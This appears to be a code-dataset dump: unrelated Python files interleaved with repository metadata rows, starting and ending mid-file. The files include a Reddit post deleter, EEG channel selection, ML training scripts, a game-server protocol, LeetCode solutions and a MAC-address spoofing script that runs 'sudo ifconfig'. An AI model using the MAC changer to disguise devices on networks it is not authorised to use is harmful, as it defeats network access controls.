subreddit = self.reddit.subreddit(subreddit)
print(f"{self.get_superhero()} finding every threatening submission made in {subreddit}")
subreddit_submissions = self.get_user_subreddit_submissions(subreddit)
self.delete_submissions(subreddit_submissions)
print(f"{self.get_superhero()} saved your from dying by the submission's author")
print(f"{self.get_superhero()} finding every forbidding comment made in {subreddit}")
subreddit_comments = self.get_user_subreddit_comments(subreddit)
self.delete_comments(subreddit_comments)
print("Savengers have saved you!")
print("Go visit https://www.reddit.com/r/savengers/ to have a chat with the fellow superheroes")
return True
except Exception as e:
print(e)
exit()
def get_user_subreddit_comments(self, subreddit):
subreddit_comments = []
for comment in self.user.comments.new(limit=None):
if comment.subreddit == subreddit:
if comment.body:
print(f"{self.get_superhero()} found a comment with the body: {comment.body}")
subreddit_comments.append(comment)
return subreddit_comments
def get_user_subreddit_submissions(self, subreddit):
subreddit_submissions = []
for submission in self.user.submissions.new(limit=None):
if submission.subreddit == subreddit:
if submission.title:
print(f"{self.get_superhero()} found a submission with the title: {submission.title}")
subreddit_submissions.append(submission)
return subreddit_submissions
def delete_comments(self, subreddit_comments):
for subreddit_comment in subreddit_comments:
print(f"{self.get_superhero()} successfully eliminated the threatening comment!")
subreddit_comment.delete()
return True
def delete_submissions(self, subreddit_submissions):
for subreddit_submission in subreddit_submissions:
print(f"{self.get_superhero()} successfully eliminated the forbidding post!")
subreddit_submission.delete()
return True
| 44.727273
| 108
| 0.626597
| 370
| 3,444
| 5.683784
| 0.318919
| 0.029957
| 0.033286
| 0.043272
| 0.162625
| 0.162625
| 0.162625
| 0.07418
| 0
| 0
| 0
| 0
| 0.278165
| 3,444
| 76
| 109
| 45.315789
| 0.845937
| 0
| 0
| 0.166667
| 0
| 0.015152
| 0.256969
| 0.044715
| 0
| 0
| 0
| 0
| 0
| 1
| 0.121212
| false
| 0.030303
| 0.030303
| 0.015152
| 0.287879
| 0.212121
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b52a4b91de40afb841386437bc92df7dcd61942d
| 1,493
|
py
|
Python
|
python-packages/pyRiemann-0.2.2/pyriemann/channelselection.py
|
rajegannathan/grasp-lift-eeg-cat-dog-solution-updated
|
ee45bee6f96cdb6d91184abc16f41bba1546c943
|
[
"BSD-3-Clause"
] | 2
|
2017-08-13T14:09:32.000Z
|
2018-07-16T23:39:00.000Z
|
python-packages/pyRiemann-0.2.2/pyriemann/channelselection.py
|
rajegannathan/grasp-lift-eeg-cat-dog-solution-updated
|
ee45bee6f96cdb6d91184abc16f41bba1546c943
|
[
"BSD-3-Clause"
] | null | null | null |
python-packages/pyRiemann-0.2.2/pyriemann/channelselection.py
|
rajegannathan/grasp-lift-eeg-cat-dog-solution-updated
|
ee45bee6f96cdb6d91184abc16f41bba1546c943
|
[
"BSD-3-Clause"
] | 2
|
2018-04-02T06:45:11.000Z
|
2018-07-16T23:39:02.000Z
|
from .utils.distance import distance
from .classification import MDM
import numpy
from sklearn.base import BaseEstimator, TransformerMixin
##########################################################
class ElectrodeSelection(BaseEstimator, TransformerMixin):
def __init__(self, nelec=16, metric='riemann'):
self.nelec = nelec
self.metric = metric
self.subelec = -1
self.dist = []
def fit(self, X, y=None):
mdm = MDM(metric=self.metric)
mdm.fit(X, y)
self.covmeans = mdm.covmeans
Ne, _ = self.covmeans[0].shape
self.subelec = range(0, Ne, 1)
while (len(self.subelec)) > self.nelec:
di = numpy.zeros((len(self.subelec), 1))
for idx in range(len(self.subelec)):
sub = self.subelec[:]
sub.pop(idx)
di[idx] = 0
for i in range(len(self.covmeans)):
for j in range(i + 1, len(self.covmeans)):
di[idx] += distance(
self.covmeans[i][
:, sub][
sub, :], self.covmeans[j][
:, sub][
sub, :])
# print di
torm = di.argmax()
self.dist.append(di.max())
self.subelec.pop(torm)
return self
def transform(self, X):
return X[:, self.subelec, :][:, :, self.subelec]
| 31.765957
| 62
| 0.464836
| 153
| 1,493
| 4.503268
| 0.326797
| 0.143687
| 0.060958
| 0.040639
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.009751
| 0.381782
| 1,493
| 46
| 63
| 32.456522
| 0.736728
| 0.005358
| 0
| 0.055556
| 0
| 0
| 0.004912
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.083333
| false
| 0
| 0.111111
| 0.027778
| 0.277778
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b52daf8a9a6916b3bc3be9fb6b077491427da67f
| 1,728
|
py
|
Python
|
mac_changer.py
|
xicoder96/luv-sic
|
033527b558c3e4d7f254dca1e2f6f0ccf9ff78fe
|
[
"MIT"
] | null | null | null |
mac_changer.py
|
xicoder96/luv-sic
|
033527b558c3e4d7f254dca1e2f6f0ccf9ff78fe
|
[
"MIT"
] | null | null | null |
mac_changer.py
|
xicoder96/luv-sic
|
033527b558c3e4d7f254dca1e2f6f0ccf9ff78fe
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import subprocess
import re
import argparse
def get_arguments():
parser = argparse.ArgumentParser()
parser.add_argument("-i", "--interface", dest="interface",
help="interface to change mac address")
parser.add_argument("-m", "--mac", dest="new_mac",
help="value of new mac address")
options = parser.parse_args()
if not options.interface:
parser.error("Please enter interface, use --help for more information")
elif not options.new_mac:
parser.error(
"Please enter new MAC address use --help for more information")
return options
def change_mac(interface, new_mac):
print(f"[+] Changing mac address for {interface} to {new_mac}")
subprocess.call(["sudo", "ifconfig", interface, "down"])
subprocess.call(["sudo", "ifconfig", interface, "hw", "ether", new_mac])
subprocess.call(["sudo", "ifconfig", interface, "up"])
def get_current_mac(interface):
ifconfig_result = str(subprocess.check_output(
["sudo", "ifconfig", interface]))
search_result = re.search(
r"\w\w:\w\w:\w\w:\w\w:\w\w:\w\w", ifconfig_result)
if search_result:
return search_result.group(0)
else:
print("[-] Could not read mac address")
if __name__ == "__main__":
options = get_arguments()
current_mac = get_current_mac(options.interface)
print(f"Current Mac:{current_mac}")
change_mac(options.interface, options.new_mac)
current_mac = get_current_mac(options.interface)
if current_mac == options.new_mac:
print(f"[+] MAC address was successfully changed to {current_mac}")
else:
print("[-] MAC address did not change")
| 33.230769
| 79
| 0.65162
| 221
| 1,728
| 4.918552
| 0.316742
| 0.020239
| 0.027599
| 0.033119
| 0.236431
| 0.158234
| 0.158234
| 0.01104
| 0.01104
| 0.01104
| 0
| 0.001468
| 0.211806
| 1,728
| 51
| 80
| 33.882353
| 0.796623
| 0.012153
| 0
| 0.1
| 0
| 0.025
| 0.292497
| 0.016999
| 0
| 0
| 0
| 0
| 0
| 1
| 0.075
| false
| 0
| 0.075
| 0
| 0.2
| 0.125
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b53016b4f1a8a22aaafbf177615312636a59d031
| 1,916
|
py
|
Python
|
training/model.py
|
J77M/stuffy-nose-recognition
|
e5d8957e2026e9046e6ffee69a60a11a686bc042
|
[
"MIT"
] | null | null | null |
training/model.py
|
J77M/stuffy-nose-recognition
|
e5d8957e2026e9046e6ffee69a60a11a686bc042
|
[
"MIT"
] | null | null | null |
training/model.py
|
J77M/stuffy-nose-recognition
|
e5d8957e2026e9046e6ffee69a60a11a686bc042
|
[
"MIT"
] | null | null | null |
import tensorflow as tf
import numpy as np
import time
import utils
path = r'data/'
x, y = utils.reload_data(path)
inp_shape = (x[0].shape[0],1)
x = np.array(x).reshape(-1, 1000, 1)# change 1000 to your sample lenght if you changed frame (= CHUNK ) or RESOLUTION
# prepared for testing and evaluating. try other combinations of architecture
dense_layers = [1]
conv_sizes = [64]
conv_layers = [2]
dense_layer_sizes = [256]
kernel = 10
pool_size = 4
_batchs = 5
_epochs = 10
for dense_layer in dense_layers:
for conv_layer in conv_layers:
for dense_size in dense_layer_sizes:
for conv_size in conv_sizes:
NAME = '{}-conv_layers-{}-dense_layers-{}-conv_size-{}-dense_size-{}-kernel-{}'.format(conv_layer,dense_layer,conv_size, dense_size,kernel, int(time.time()))
model = tf.keras.Sequential()
model.add(tf.keras.layers.Conv1D(conv_size, kernel, activation='relu', input_shape = inp_shape))
model.add(tf.keras.layers.MaxPooling1D(pool_size))
for i in range(conv_layer-1):
model.add(tf.keras.layers.Conv1D(conv_size, kernel, activation='relu'))
model.add(tf.keras.layers.MaxPooling1D(pool_size))
model.add(tf.keras.layers.Flatten())
for _ in range(dense_layer):
model.add(tf.keras.layers.Dense(dense_size, activation='relu'))
model.add(tf.keras.layers.Dense(1, activation='sigmoid'))
model.compile(loss = 'binary_crossentropy', optimizer='adam', metrics=['accuracy'])
tensorboard = tf.keras.callbacks.TensorBoard(log_dir='model_evaluate/{}'.format(NAME))
print(NAME)
model.fit(x,y, batch_size = _batchs, epochs=_epochs, validation_split = 0.2, callbacks=[tensorboard])
model.save('trained_models/{}.h5'.format(NAME))
| 39.102041
| 173
| 0.641441
| 256
| 1,916
| 4.625
| 0.382813
| 0.053209
| 0.059122
| 0.088682
| 0.274493
| 0.217905
| 0.191723
| 0.162162
| 0.092905
| 0.092905
| 0
| 0.023826
| 0.233299
| 1,916
| 49
| 174
| 39.102041
| 0.782165
| 0.080898
| 0
| 0.055556
| 0
| 0
| 0.092098
| 0.039795
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.111111
| 0
| 0.111111
| 0.027778
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b5325a85e324486debcb82eb330c6fd293cb8cf4
| 1,306
|
py
|
Python
|
game/game/protocol.py
|
maosplx/L2py
|
5d81b2ea150c0096cfce184706fa226950f7f583
|
[
"MIT"
] | 7
|
2020-09-01T21:52:37.000Z
|
2022-02-25T16:00:08.000Z
|
game/game/protocol.py
|
maosplx/L2py
|
5d81b2ea150c0096cfce184706fa226950f7f583
|
[
"MIT"
] | 4
|
2021-09-10T22:15:09.000Z
|
2022-03-25T22:17:43.000Z
|
game/game/protocol.py
|
maosplx/L2py
|
5d81b2ea150c0096cfce184706fa226950f7f583
|
[
"MIT"
] | 9
|
2020-09-01T21:53:39.000Z
|
2022-03-30T12:03:04.000Z
|
import logging
from common.api_handlers import handle_request
from common.packet import Packet
from common.response import Response
from common.transport.protocol import TCPProtocol
from game.models.world import WORLD
from game.session import GameSession
from game.states import Connected
LOG = logging.getLogger(f"l2py.{__name__}")
class Lineage2GameProtocol(TCPProtocol):
session_cls = GameSession
def connection_made(self, transport):
super().connection_made(transport)
LOG.info(
"New connection from %s:%s",
*self.transport.peer,
)
self.session.set_state(Connected)
@TCPProtocol.make_async
async def data_received(self, data: bytes):
request = self.transport.read(data)
response = await handle_request(request)
if response:
LOG.debug(
"Sending packet to %s:%s",
*self.transport.peer,
)
self.transport.write(response)
for action in response.actions_after:
action_result = await action
if isinstance(action_result, Packet):
self.transport.write(Response(action_result, self.session))
def connection_lost(self, exc) -> None:
self.session.logout_character()
| 30.372093
| 79
| 0.658499
| 146
| 1,306
| 5.760274
| 0.431507
| 0.092747
| 0.014269
| 0.035672
| 0.054697
| 0.054697
| 0
| 0
| 0
| 0
| 0
| 0.00207
| 0.260337
| 1,306
| 42
| 80
| 31.095238
| 0.86853
| 0
| 0
| 0.058824
| 0
| 0
| 0.048239
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.058824
| false
| 0
| 0.235294
| 0
| 0.352941
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b536ac94f02abdab43e5ca604aa965f6ad2715d0
| 1,394
|
py
|
Python
|
pyoptmat/solvers.py
|
Argonne-National-Laboratory/pyoptmat
|
a6e5e8d0b93c77374d4ccbc65a86262eec5df77b
|
[
"MIT"
] | null | null | null |
pyoptmat/solvers.py
|
Argonne-National-Laboratory/pyoptmat
|
a6e5e8d0b93c77374d4ccbc65a86262eec5df77b
|
[
"MIT"
] | 1
|
2022-03-30T22:20:38.000Z
|
2022-03-31T15:02:22.000Z
|
pyoptmat/solvers.py
|
Argonne-National-Laboratory/pyoptmat
|
a6e5e8d0b93c77374d4ccbc65a86262eec5df77b
|
[
"MIT"
] | 2
|
2021-11-16T15:13:54.000Z
|
2022-01-06T21:35:42.000Z
|
import torch
import warnings
def newton_raphson(fn, x0, linsolver = "lu", rtol = 1e-6, atol = 1e-10,
miter = 100):
"""
Solve a nonlinear system with Newton's method. Return the
solution and the last Jacobian
Args:
fn: function that returns the residual and Jacobian
x0: starting point
linsolver (optional): method to use to solve the linear system
rtol (optional): nonlinear relative tolerance
atol (optional): nonlinear absolute tolerance
miter (optional): maximum number of nonlinear iterations
"""
x = x0
R, J = fn(x)
nR = torch.norm(R, dim = -1)
nR0 = nR
i = 0
while (i < miter) and torch.any(nR > atol) and torch.any(nR / nR0 > rtol):
x -= solve_linear_system(J, R)
R, J = fn(x)
nR = torch.norm(R, dim = -1)
i += 1
if i == miter:
warnings.warn("Implicit solve did not succeed. Results may be inaccurate...")
return x, J
def solve_linear_system(A, b, method = "lu"):
"""
Solve or iterate on a linear system of equations
Args:
A: block matrix
b: block RHS
method (optional):
"""
if method == "diag":
return b / torch.diagonal(A, dim1=-2, dim2=-1)
elif method == "lu":
return torch.linalg.solve(A, b)
else:
raise ValueError("Unknown solver method!")
| 27.333333
| 82
| 0.585366
| 191
| 1,394
| 4.246073
| 0.471204
| 0.059186
| 0.009864
| 0.01233
| 0.051788
| 0.051788
| 0.051788
| 0.051788
| 0.051788
| 0.051788
| 0
| 0.021784
| 0.308465
| 1,394
| 50
| 83
| 27.88
| 0.819502
| 0.422525
| 0
| 0.166667
| 0
| 0
| 0.127572
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.083333
| false
| 0
| 0.083333
| 0
| 0.291667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b5373a616def2b1d58dca3805f309b56a4c149e0
| 323
|
py
|
Python
|
Algo and DSA/LeetCode-Solutions-master/Python/number-of-substrings-with-only-1s.py
|
Sourav692/FAANG-Interview-Preparation
|
f523e5c94d582328b3edc449ea16ac6ab28cdc81
|
[
"Unlicense"
] | 3,269
|
2018-10-12T01:29:40.000Z
|
2022-03-31T17:58:41.000Z
|
Algo and DSA/LeetCode-Solutions-master/Python/number-of-substrings-with-only-1s.py
|
Sourav692/FAANG-Interview-Preparation
|
f523e5c94d582328b3edc449ea16ac6ab28cdc81
|
[
"Unlicense"
] | 53
|
2018-12-16T22:54:20.000Z
|
2022-02-25T08:31:20.000Z
|
Algo and DSA/LeetCode-Solutions-master/Python/number-of-substrings-with-only-1s.py
|
Sourav692/FAANG-Interview-Preparation
|
f523e5c94d582328b3edc449ea16ac6ab28cdc81
|
[
"Unlicense"
] | 1,236
|
2018-10-12T02:51:40.000Z
|
2022-03-30T13:30:37.000Z
|
# Time: O(n)
# Space: O(1)
class Solution(object):
def numSub(self, s):
"""
:type s: str
:rtype: int
"""
MOD = 10**9+7
result, count = 0, 0
for c in s:
count = count+1 if c == '1' else 0
result = (result+count)%MOD
return result
| 20.1875
| 46
| 0.436533
| 44
| 323
| 3.204545
| 0.659091
| 0.156028
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.054054
| 0.427245
| 323
| 15
| 47
| 21.533333
| 0.708108
| 0.151703
| 0
| 0
| 0
| 0
| 0.004149
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0
| 0
| 0.375
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b537ff6eac7f94b76cf8db09b3957cee998efb52
| 4,531
|
py
|
Python
|
usecase-2/monitoring/fleet-seat-info-monitor/src/seat_res_train_monitor.py
|
edgefarm/edgefarm-demos
|
6381d4a2f7f9c1d0632ab8123fed2bd0763d3b34
|
[
"MIT"
] | null | null | null |
usecase-2/monitoring/fleet-seat-info-monitor/src/seat_res_train_monitor.py
|
edgefarm/edgefarm-demos
|
6381d4a2f7f9c1d0632ab8123fed2bd0763d3b34
|
[
"MIT"
] | 9
|
2021-04-21T10:37:45.000Z
|
2021-07-28T05:56:50.000Z
|
usecase-2/monitoring/fleet-seat-info-monitor/src/seat_res_train_monitor.py
|
edgefarm/train-simulation
|
6381d4a2f7f9c1d0632ab8123fed2bd0763d3b34
|
[
"MIT"
] | null | null | null |
import logging
import datetime
import asyncio
from edgefarm_application.base.application_module import application_module_network_nats
from edgefarm_application.base.avro import schemaless_decode
from run_task import run_task
from state_tracker import StateTracker
from schema_loader import schema_load
_logger = logging.getLogger(__name__)
_state_report_subject = "public.seatres.status"
class SeatResTrainMonitor:
def __init__(self, train_id, q):
self.train_id = train_id
self.edge_report_ts = None
# this is the combined state from the train and the train online state
self.state = StateTracker(
"TrainSeatRes",
{
"UNKNOWN": "unknown",
"OFFLINE": "offline",
"ONLINE-UNKNOWN": "online, unclear state",
"ONLINE-NOK": "online, but not ok",
"ONLINE-OK": "online, ok",
},
)
# this is just the online state of the train
self.state_online = StateTracker(
"Train-Online-Monitor",
{
"UNKNOWN": "train state unknown",
"OFFLINE": "train is offline",
"ONLINE": "train is online",
},
)
self._q = q
self._task = asyncio.create_task(run_task(_logger, q, self._watchdog))
async def start(self):
self.state.update("UNKNOWN")
await self.state_online.update_and_send_event("UNKNOWN", self._send_event)
def stop(self):
self._task.cancel()
async def update_edge_state(self, state):
self.edge_report_ts = datetime.datetime.now()
if state == -1:
up_state = "ONLINE-UNKNOWN"
elif state == 0:
up_state = "ONLINE-NOK"
elif state == 1:
up_state = "ONLINE-OK"
self.state.update(up_state)
await self.state_online.update_and_send_event("ONLINE", self._send_event)
async def _watchdog(self):
while True:
now = datetime.datetime.now()
if self.edge_report_ts is not None:
if (now - self.edge_report_ts).total_seconds() > 10:
self.state.update("OFFLINE")
await self.state_online.update_and_send_event(
"OFFLINE", self._send_event
)
await asyncio.sleep(1)
async def _send_event(self, data):
data["train_id"] = self.train_id
await self._q.put(data)
class TrainStatusCollector:
"""
Collect seat reservation system status of all trains.
The individual trains report their SeatRes state via Nats subject 'public.seatres.status' to
this module.
"""
def __init__(self, q):
self._nc = application_module_network_nats()
self._q = q
self._state_report_codec = schema_load(__file__, "system_status")
self._trains = {}
async def start(self):
self._state_report_subscription_id = await self._nc.subscribe(
_state_report_subject, cb=self._state_report_handler
)
async def stop(self):
await self._nc.unsubscribe(self._state_report_subscription_id)
for v in self._trains.values():
v.stop()
async def add_train(self, train_id):
if train_id not in self._trains.keys():
v = SeatResTrainMonitor(train_id, self._q)
self._trains[train_id] = v
await v.start()
else:
v = self._trains[train_id]
return v
def trains(self):
return self._trains.values()
async def _state_report_handler(self, nats_msg):
"""
Called when a NATS message is received on _state_report_subject
"""
reply_subject = nats_msg.reply
msg = schemaless_decode(nats_msg.data, self._state_report_codec)
_logger.debug(f"state report received msg {msg}")
train_id = msg["data"]["trainId"]
try:
v = self._trains[train_id]
await self._update_edge_state(v, msg)
except KeyError:
_logger.info(f"received state report from new train {train_id}")
v = await self.add_train(train_id)
await self._update_edge_state(v, msg)
await self._nc.publish(reply_subject, b"")
async def _update_edge_state(self, v, msg):
try:
await v.update_edge_state(msg["data"]["status"])
except KeyError:
_logger.error(f"couldn't find [data][status] in {msg}")
| 31.685315
| 96
| 0.608034
| 549
| 4,531
| 4.73224
| 0.238616
| 0.037721
| 0.028868
| 0.024634
| 0.156274
| 0.111624
| 0.070824
| 0.070824
| 0.026944
| 0
| 0
| 0.001888
| 0.29861
| 4,531
| 142
| 97
| 31.908451
| 0.815607
| 0.060252
| 0
| 0.115385
| 0
| 0
| 0.110227
| 0.005065
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038462
| false
| 0
| 0.076923
| 0.009615
| 0.153846
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b538595bde41c89c5a8fbdc33e2ae560a927b953
| 1,597
|
py
|
Python
|
src/AML/run_training.py
|
monkeypants/CartridgeOCR
|
a2cdaa72e3839a881118b85f5ff7b4515579004b
|
[
"MIT"
] | 2
|
2021-07-12T02:37:46.000Z
|
2021-12-28T23:03:20.000Z
|
src/AML/run_training.py
|
monkeypants/CartridgeOCR
|
a2cdaa72e3839a881118b85f5ff7b4515579004b
|
[
"MIT"
] | 28
|
2021-12-29T00:51:24.000Z
|
2022-03-24T08:03:59.000Z
|
src/AML/run_training.py
|
monkeypants/CartridgeOCR
|
a2cdaa72e3839a881118b85f5ff7b4515579004b
|
[
"MIT"
] | 4
|
2021-09-24T16:13:43.000Z
|
2022-03-09T17:52:35.000Z
|
import sys
from azureml.core import Workspace, Experiment, Environment, ScriptRunConfig
from azureml.core.compute import ComputeTarget, AmlCompute
from azureml.core.compute_target import ComputeTargetException
from shutil import copy
ws = Workspace.from_config()
# Choose a name for your CPU cluster
# cpu_cluster_name = "cpucluster"
cpu_cluster_name = "gpucompute"
experiment_name = "main"
src_dir = "model"
script = "train.py"
# Verify that cluster does not exist already
try:
cpu_cluster = ComputeTarget(workspace=ws, name=cpu_cluster_name)
print('Found existing cluster, use it.')
except ComputeTargetException:
compute_config = AmlCompute.provisioning_configuration(vm_size='Standard_DS12_v2',
max_nodes=4)
cpu_cluster = ComputeTarget.create(ws, cpu_cluster_name, compute_config)
cpu_cluster.wait_for_completion(show_output=True)
experiment = Experiment(workspace=ws, name=experiment_name)
copy('./config.json', 'model/config.json')
myenv = Environment.from_pip_requirements(name="myenv",
file_path="requirements.txt")
myenv.environment_variables['PYTHONPATH'] = './model'
myenv.environment_variables['RUNINAZURE'] = 'true'
config = ScriptRunConfig(source_directory=src_dir,
script="./training/train.py",
arguments=sys.argv[1:] if len(sys.argv) > 1 else None,
compute_target=cpu_cluster_name, environment=myenv)
run = experiment.submit(config)
aml_url = run.get_portal_url()
print(aml_url)
| 35.488889
| 86
| 0.708203
| 187
| 1,597
| 5.834225
| 0.475936
| 0.082493
| 0.064161
| 0.04033
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.004688
| 0.198497
| 1,597
| 44
| 87
| 36.295455
| 0.847656
| 0.068253
| 0
| 0
| 0
| 0
| 0.117925
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.16129
| 0
| 0.16129
| 0.064516
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b538fc619dc6adad01e93a8132a517e7cc8b2d80
| 818
|
py
|
Python
|
tests/conftest.py
|
cielavenir/pyppmd-py2
|
c148b8fbe7cb0c0e9f68fdf9a1c3599325f0e4c8
|
[
"BSD-3-Clause"
] | 3
|
2021-05-04T13:20:39.000Z
|
2021-11-03T12:43:02.000Z
|
tests/conftest.py
|
cielavenir/pyppmd-py2
|
c148b8fbe7cb0c0e9f68fdf9a1c3599325f0e4c8
|
[
"BSD-3-Clause"
] | 39
|
2021-04-16T02:55:28.000Z
|
2022-03-30T14:23:50.000Z
|
tests/conftest.py
|
cielavenir/pyppmd-py2
|
c148b8fbe7cb0c0e9f68fdf9a1c3599325f0e4c8
|
[
"BSD-3-Clause"
] | 3
|
2021-07-07T17:39:30.000Z
|
2022-03-30T15:15:44.000Z
|
import cpuinfo
def pytest_benchmark_update_json(config, benchmarks, output_json):
"""Calculate compression/decompression speed and add as extra_info"""
for benchmark in output_json["benchmarks"]:
if "data_size" in benchmark["extra_info"]:
rate = benchmark["extra_info"].get("data_size", 0.0) / benchmark["stats"]["mean"]
benchmark["extra_info"]["rate"] = rate
def pytest_benchmark_update_machine_info(config, machine_info):
cpu_info = cpuinfo.get_cpu_info()
brand = cpu_info.get("brand_raw", None)
if brand is None:
brand = "{} core(s) {} CPU ".format(cpu_info.get("count", "unknown"), cpu_info.get("arch", "unknown"))
machine_info["cpu"]["brand"] = brand
machine_info["cpu"]["hz_actual_friendly"] = cpu_info.get("hz_actual_friendly", "unknown")
| 43.052632
| 110
| 0.684597
| 109
| 818
| 4.862385
| 0.40367
| 0.079245
| 0.075472
| 0.090566
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.00292
| 0.162592
| 818
| 18
| 111
| 45.444444
| 0.770803
| 0.077017
| 0
| 0
| 0
| 0
| 0.233645
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.153846
| false
| 0
| 0.076923
| 0
| 0.230769
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b53920dd20dbdafabadb24be44f2a512437147fb
| 331
|
py
|
Python
|
examples/test_gcld3.py
|
lbp0200/EasyNMT
|
d253e9346996a47aa989bb33aed72e531528dc27
|
[
"Apache-2.0"
] | null | null | null |
examples/test_gcld3.py
|
lbp0200/EasyNMT
|
d253e9346996a47aa989bb33aed72e531528dc27
|
[
"Apache-2.0"
] | null | null | null |
examples/test_gcld3.py
|
lbp0200/EasyNMT
|
d253e9346996a47aa989bb33aed72e531528dc27
|
[
"Apache-2.0"
] | null | null | null |
import time
import gcld3
detector = gcld3.NNetLanguageIdentifier(min_num_bytes=0,
max_num_bytes=1000)
# text = "This text is written in English"
text = "薄雾"
while True:
result = detector.FindLanguage(text=text)
print(text, result.probability, result.language)
time.sleep(0.01)
| 25.461538
| 59
| 0.65861
| 41
| 331
| 5.219512
| 0.658537
| 0.074766
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.040323
| 0.250755
| 331
| 12
| 60
| 27.583333
| 0.822581
| 0.120846
| 0
| 0
| 0
| 0
| 0.00692
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.222222
| 0
| 0.222222
| 0.111111
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b539e3fd28c31f9e28937feef603fdbd7a3fc98e
| 1,593
|
py
|
Python
|
src/0075下一个排列/index.py
|
zzh2036/OneDayOneLeetcode
|
1198692e68f8f0dbf15555e45969122e1a92840a
|
[
"MIT"
] | null | null | null |
src/0075下一个排列/index.py
|
zzh2036/OneDayOneLeetcode
|
1198692e68f8f0dbf15555e45969122e1a92840a
|
[
"MIT"
] | null | null | null |
src/0075下一个排列/index.py
|
zzh2036/OneDayOneLeetcode
|
1198692e68f8f0dbf15555e45969122e1a92840a
|
[
"MIT"
] | null | null | null |
'''
实现获取 下一个排列 的函数,算法需要将给定数字序列重新排列成字典序中下一个更大的排列。
如果不存在下一个更大的排列,则将数字重新排列成最小的排列(即升序排列)。
必须 原地 修改,只允许使用额外常数空间。
示例 1:
输入:nums = [1,2,3]
输出:[1,3,2]
示例 2:
输入:nums = [3,2,1]
输出:[1,2,3]
示例 3:
输入:nums = [1,1,5]
输出:[1,5,1]
示例 4:
输入:nums = [1]
输出:[1]
提示:
1 <= nums.length <= 100
0 <= nums[i] <= 100
'''
class Solution:
def nextPermutation(self, nums: List[int]) -> None:
"""
Do not return anything, modify nums in-place instead.
"""
n = len(nums)
if n <= 1:
return nums
# 从右向左循环数组
i = n - 1
while i > 0:
# 找到相邻的两位元素,右侧的数值大于左侧的数值
if nums[i] > nums[i - 1]:
